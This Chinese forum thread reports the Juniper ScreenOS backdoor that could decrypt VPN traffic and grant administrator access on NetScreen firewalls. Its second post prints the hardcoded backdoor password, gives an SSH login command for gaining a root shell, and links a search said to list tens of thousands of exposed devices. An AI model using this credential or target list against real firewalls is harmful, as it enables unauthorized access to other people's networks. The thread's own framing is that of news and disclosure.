发新话题
打印

Juniper防火墙包含未授权代码能解密VPN流量

Juniper防火墙包含未授权代码能解密VPN流量

Juniper Networks发出警告,它的防火墙产品NetScreen firewall使用的操作系统包含了“未授权代码”,能悄悄解密VPN流量,给予攻击者管理员访问权限。目前不清楚未授权代码存在了多长时间,又是如何进入到系统的。受影响的系统版本ScreenOS 6.2.0r15-6.2.0r18, 以及6.3.0r12 -6.3.0r20,最早的受影响版本可以上溯至2012年。Juniper的CIO Bob Worrall称,该公司是在最近的一次内部代码审查中发现未授权代码的。该公司表示,没有办法能探测出该漏洞被利用过。纂改系统去解密VPN,看起来此事最有可能是NSA或其它国家的同行干的。Edward Snowden泄露的机密文件显示,NSA曾在思科的网络产品中植入后门,它也曾以 Juniper 的防火墙为目标获取永久性的后门访问权限。

原文:http://www.solidot.org/story?sid=46577

[ 本帖最后由 linda 于 2016-2-29 17:47 编辑 ]

TOP

Juniper Networks(瞻博网络)远程管理访问后门

漏洞概要Juniper网络公司(中文名:瞻博网络)致力于实现网络商务模式的转型。作为全球领先的联网和安全性解决方案供应商,Juniper网络公司对依赖网络获得战略性收益的客户一直给予密切关注。公司的客户来自全球各行各业,包括主要的网络运营商、企业、政府机构以及研究和教育机构等。Juniper网络公司推出的一系列联网解决方案,提供所需的安全性和性能来支持全球最大型、最复杂、要求最严格的关键网络。
瞻博网络内部代码审计过程中发现了远程管理访问后门,可允许攻击者通过 SSH 或者 telnet 远程管理访问设备。影响ScreenOS 6.2.0r15—6.2.0r18,6.3.0r12—6.3.0r20版本。

漏洞详情贡献者 Root 共获得  0KB

漏洞演示使用后门帐号密码登录
使用 root 帐号,配合后门密码 <<< %s(un='%s') = %u
ssh root@ip<<< %s(un='%s') = %u得到 SSH Shell

影响范围通过 ZoomEye 搜索:https://www.zoomeye.org/search?q=NetScreen+sshd

可以搜索到有 47831 个 NetScreen 防火墙设备。

TOP

发新话题